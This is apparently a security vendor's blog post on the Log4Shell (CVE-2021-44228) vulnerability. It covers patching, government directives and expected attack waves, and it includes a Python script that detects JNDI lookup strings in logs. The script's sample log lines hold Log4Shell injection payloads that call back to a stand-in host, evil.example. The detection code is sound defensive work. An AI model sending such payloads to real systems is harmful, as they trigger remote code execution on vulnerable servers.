This article explains the details and implications of the Log4j vulnerability and gives 7 tips for staying protected. Also known as Log4Shell, it is being called by experts one of the worst cybersecurity vulnerabilities ever exploited, because it enables hackers to hijack critical infrastructure systems and computer networks through the ubiquitous open-source Apache logging library. Many private and public organizations are affected by this zero-day vulnerability, which has grabbed headlines and sent both CISOs and government agencies scrambling to contain the security flaw. CISA and the Department of Homeland Security issued Emergency Directive 22-02, ordering all hands on deck at federal agencies to patch the vulnerability and squash the bug before something really bad happens.
Log4j is an open-source logging framework that developers use to record activity within an application by logging security and performance information. The software, written in the Java programming language, runs across many platforms including macOS, Windows, and Linux, and touches a vast array of organizations, services and products. Log4j code is seemingly woven into the very fabric of the digital world, from consumer and enterprise services to websites and applications, and on to the operational technology products that monitor critical infrastructure (like power generation and food production) and control robots in industrial processes and manufacturing. Managed by volunteers in the Apache Software Foundation, Log4j powers everything from webcams to car navigation systems to medical devices, and it really is virtually everywhere: Twitter, Amazon, Microsoft, Minecraft, to name but a tiny few.
The vulnerability offers something like a skeleton key to controlling the myriad systems running on Log4j. It allows a malicious actor to perform a remote code execution (CVE-2021-44228) attack on an affected platform, which ultimately lets the attacker execute whatever command they like and take control of that system. It is an easy exploit to execute: attackers submit a malicious string through the vulnerability, wait for it to get logged, and then enjoy control over that system. Infosec teams at federal, state, and corporate levels are scurrying to patch the vulnerability and shut all the open doors through which hackers have entered. The first Apache patch, version 2.15, was followed by 2.16 and then 2.17, which also protects against a denial-of-service attack, in which hackers block authorized users' access to their network. Make sure you're always updated to the latest version to gain the latest protections!
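As an added detection example (not code from the article or from Hoxhunt), the following Python scans web-server log lines for the Log4j JNDI lookup string that triggers CVE-2021-44228 when it gets logged, and pulls out the source address and callback host for triage and egress blocking. The log lines, hostnames and addresses are constructed sample data.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not real traffic): request fields an
# attacker controls (path, User-Agent) are exactly what gets passed to Log4j.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://evil.example:1389/a}"',
    '10.0.0.3 - - [10/Dec/2021:12:00:11 +0000] "GET /docs/${version} HTTP/1.1" 404 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:15 +0000] "GET /search?q=${JNDI:rmi://evil.example/b} HTTP/1.1" 400 "curl/7.79"',
]

# A Log4j lookup aimed at JNDI looks like "${jndi:<scheme>://<host>[:port]/...".
# Matched case-insensitively; the scheme and callback host are captured.
# Plain "${...}" strings without "jndi:" (like "${version}") are not flagged.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:\s*([a-z]+)://([^/:}\s]+)", re.IGNORECASE)
SOURCE_IP = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s")


def scan_line(line: str) -> List[Dict[str, str]]:
    """Return one finding per JNDI lookup found in a log line (empty if none)."""
    src = SOURCE_IP.match(line)
    return [
        {
            "source": src.group(1) if src else "unknown",
            "scheme": m.group(1).lower(),
            "callback_host": m.group(2),
        }
        for m in JNDI_LOOKUP.finditer(line)
    ]


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Scan a whole log and collect every finding in order of appearance."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        findings.extend(scan_line(line))
    return findings


def callback_hosts(findings: List[Dict[str, str]]) -> List[str]:
    """Distinct hosts the lookups call back to: candidates for egress blocking."""
    return sorted({f["callback_host"] for f in findings})


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("callback hosts to block:", callback_hosts(hits))
```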
The Cybersecurity and Infrastructure Security Agency, CISA, has ordered federal civilian agencies to apply patches before Christmas. Meanwhile, juggernaut tech companies like IBM, Cisco and VMware are burning the midnight oil to fix Log4j vulnerabilities in their products. The security flaw is rare for the outsized threat it poses compared to the rudimentary skills required to exploit it.
The Hoxhunt platform is not impacted by the vulnerability. Hoxhunt services do not include any technology vulnerable to the Log4j (CVE-2021-44228) vulnerability. Some of Hoxhunt's subcontractors do use Log4j, but based on our analysis and their response so far, they don't use it in a way that would affect Hoxhunt.
We are in the detection and response phase of this massive attack. Cybersecurity teams are racing to detect which systems have been compromised and for how long, in order to calibrate their response. The vulnerability was reported to Apache by the Chinese retail platform Alibaba on Nov. 24, and the first patch was released two weeks later. But it is unknown which organizations and which systems have been affected (here's an ongoing list), how long attackers were able to creep around unseen, and what their ultimate intentions are. As of the 2021-2022 winter holiday season, we are bracing for the worst that's sure to come.
The Log4j hacking is expected to come in waves. The initial hacks have involved cryptominers deploying malware into compromised systems to use them for the resource-intensive enterprise of mining cryptocurrency. But state-sponsored hackers are known to be involved in this attack, and extortion and ransomware attacks are anticipated in the next wave.
Forrester provides a freaky insight: Alibaba, as a Chinese company, was legally required to disclose the vulnerability to the Chinese government, a hostile cyber adversary of the United States, before reporting it to Apache in November. Basically, China at the state level had an unknown amount of time to figure out ways to exploit Log4j before it was even reported to Apache and the world. Yikes.
There is very little that end users can do to help defend against the Log4j threat. But infosec teams are likely to have their hands full in the coming weeks protecting themselves and their customers. Here are a few guidelines for protecting your systems from attack.
And finally: laugh. The one upside to Log4j has been the epic rush of memes. With all the uncertainty and chaos surrounding the Log4j fiasco, seek out some good ol' gallows humor where you can to relieve the stress and cope with the emergency. Here are a couple of Hoxhunt memes, courtesy of Hoxhunt's own Art Director, Rosanna Salminen, to keep up your holiday spirit.